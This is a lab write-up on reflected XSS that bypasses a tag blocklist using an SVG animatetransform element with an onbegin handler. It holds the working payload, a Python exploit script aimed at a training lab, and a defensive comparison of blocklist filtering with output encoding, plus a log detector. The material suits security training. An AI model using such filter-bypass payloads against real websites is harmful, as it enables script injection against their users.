Shubham Ranpise


XSS Lab 16

Exploiting XSS when common tags are blocked but SVG tags and events are allowed.


Reflected XSS with some SVG markup allowed

This lab demonstrates a simple reflected cross-site scripting (XSS) vulnerability in which common HTML tags are blocked. However, certain SVG tags and event attributes are not filtered, which lets us execute JavaScript and trigger the alert() function.

How the exploit works

  • Standard payloads like <img src=1 onerror=alert(1)> are blocked.
  • Using Burp Intruder, we test different tags and attributes from the XSS cheat sheet.
  • Tags like <svg> and <animatetransform> are allowed.
  • Among events, onbegin works with <animatetransform>.
  • Final payload that triggers an alert:

```plaintext
<svg><animatetransform onbegin=alert(1)>
```
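The bullets above describe why a tag blocklist fails here: the filter rejects tag names it knows about, but <animatetransform> with an onbegin handler is not on the list, so the raw input reaches the page. The following added example (my own code, not part of the original write-up or the lab) contrasts a blocklist-only renderer with one that HTML-encodes the reflected search term, and adds a small access-log check that flags search requests whose decoded value contains an inline event handler. The blocklist contents, the page template and the log lines are constructed assumptions; the lab's real filter rules are not published on this page.

```python
import html
import re
from urllib.parse import parse_qs, urlsplit

# Decoded form of the payload the write-up sends in the search parameter.
LAB_PAYLOAD = '"><svg><animatetransform onbegin=alert(1)>'

# Constructed tag blocklist approximating the lab's filter; the real rules are not
# published on the page, so this set is an assumption used only for illustration.
BLOCKED_TAGS = {"script", "img", "iframe", "object", "embed", "body", "input", "a", "div"}

TAG_NAME_RE = re.compile(r"<\s*/?\s*([a-zA-Z][a-zA-Z0-9-]*)")
# Any element that carries an inline event-handler attribute (onerror=, onbegin=, ...).
LIVE_HANDLER_RE = re.compile(r"<[a-zA-Z][^>]*\son[a-zA-Z]+\s*=", re.IGNORECASE)

# Constructed stand-in for the lab's search results page.
PAGE_TEMPLATE = "<section class=blog-header><h1>0 search results for '{term}'</h1></section>"


def blocklist_rejects(value: str) -> bool:
    """True when any tag name in value is on the blocklist (the lab's style of filtering)."""
    return any(m.group(1).lower() in BLOCKED_TAGS for m in TAG_NAME_RE.finditer(value))


def render_blocklist_only(term: str) -> str:
    """Vulnerable rendering: drop blocklisted input, otherwise reflect it unencoded."""
    if blocklist_rejects(term):
        term = ""  # constructed 'rejected' behaviour
    return PAGE_TEMPLATE.format(term=term)


def render_encoded(term: str) -> str:
    """Hardened rendering: HTML-encode the reflected value; no tag list is needed."""
    return PAGE_TEMPLATE.format(term=html.escape(term, quote=True))


def has_live_event_handler(markup: str) -> bool:
    """Does the markup contain a real element with an inline on* handler attribute?"""
    return LIVE_HANDLER_RE.search(markup) is not None


def flag_suspicious_search_requests(log_lines):
    """Return (line_no, decoded_term) for access-log lines whose search parameter
    decodes to markup carrying an inline event handler. Requests the filter would
    have blocked are flagged too: both are attempted injections worth alerting on."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        try:
            # request target from the quoted "GET /path?query HTTP/1.1" field
            target = line.split('"')[1].split()[1]
        except IndexError:
            continue
        for term in parse_qs(urlsplit(target).query).get("search", []):
            if has_live_event_handler(term):  # parse_qs has already percent-decoded it
                hits.append((n, term))
    return hits


# Constructed access-log sample in combined log format.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:01 +0000] "GET /?search=svg+icons HTTP/1.1" 200 1042',
    '203.0.113.5 - - [01/Jan/2024:10:00:07 +0000] "GET /?search=%3Cimg%20src%3D1%20onerror%3Dalert(1)%3E HTTP/1.1" 200 998',
    '203.0.113.5 - - [01/Jan/2024:10:00:12 +0000] "GET /?search=%22%3E%3Csvg%3E%3Canimatetransform%20onbegin=alert(1)%3E HTTP/1.1" 200 1103',
    '203.0.113.5 - - [01/Jan/2024:10:00:20 +0000] "GET /post?postId=3 HTTP/1.1" 200 5120',
    'malformed line with no request field',
]

if __name__ == "__main__":
    for name, render in (("blocklist only", render_blocklist_only), ("output encoding", render_encoded)):
        page = render(LAB_PAYLOAD)
        print(f"{name:16} live handler={has_live_event_handler(page)}  {page}")
    for n, term in flag_suspicious_search_requests(SAMPLE_LOG):
        print(f"log line {n}: {term}")
```

Run as-is to see the blocklist renderer pass the SVG payload through intact while the encoded renderer turns every `<` into `&lt;`, and to see both the blocked <img> attempt and the successful <svg> attempt flagged from the log. The point of the comparison is that encoding for the output context removes the need to enumerate tag names at all.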

Usage

```cmd
python3 exploit.py https://<your-lab-id>.web-security-academy.net
```

Exploit

exploit.py

```python
import requests
import sys
import urllib3

# Disable SSL warnings (Burp Suite's self-signed certificate is not trusted)
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Route all requests through the Burp Suite proxy
proxies = {
    'http': 'http://127.0.0.1:8080',
    'https': 'http://127.0.0.1:8080'
}

def check_burp():
    """Check that Burp Suite is running and listening on the configured proxy."""
    try:
        requests.get("http://127.0.0.1:8080", timeout=3)
    except requests.exceptions.RequestException:
        print("[-] Burp Suite is not running. Please start it and try again.")
        sys.exit(1)

def exploit_xss(url, payload):
    """Send the payload in the search parameter, then check whether the lab reports as solved."""
    uri = f"/?search={payload}"
    res = requests.get(url + uri, verify=False, proxies=proxies)
    res.raise_for_status()
    # Reload the lab home page: the banner changes to "Congratulations" once solved
    session = requests.Session()
    res = session.get(url, verify=False, proxies=proxies)
    if "Congratulations" in res.text:
        print("[+] Lab solved 🎉")
        return True
    print("[-] lab not solved.")
    return False

def main():
    """Entry point of the script."""
    if len(sys.argv) != 2:
        print(f"Usage: python {sys.argv[0]} <url>")
        print(f"Example: python {sys.argv[0]} https://example.com")
        sys.exit(1)

    # Base URL including scheme, without a trailing slash (exploit_xss appends the path)
    url = sys.argv[1].strip().rstrip("/")

    # Step 1: Check Burp Suite
    check_burp()

    # Step 2: Define the URL-encoded XSS payload: "><svg><animatetransform onbegin=alert(1)>
    payload = "%22%3E%3Csvg%3E%3Canimatetransform%20onbegin=alert(1)%3E"

    # Step 3: Attempt exploitation
    print("[*] Attempting XSS...")
    if exploit_xss(url, payload):
        print("[+] XSS successful!")
    else:
        print("[-] XSS unsuccessful.")

if __name__ == "__main__":
    main()
```
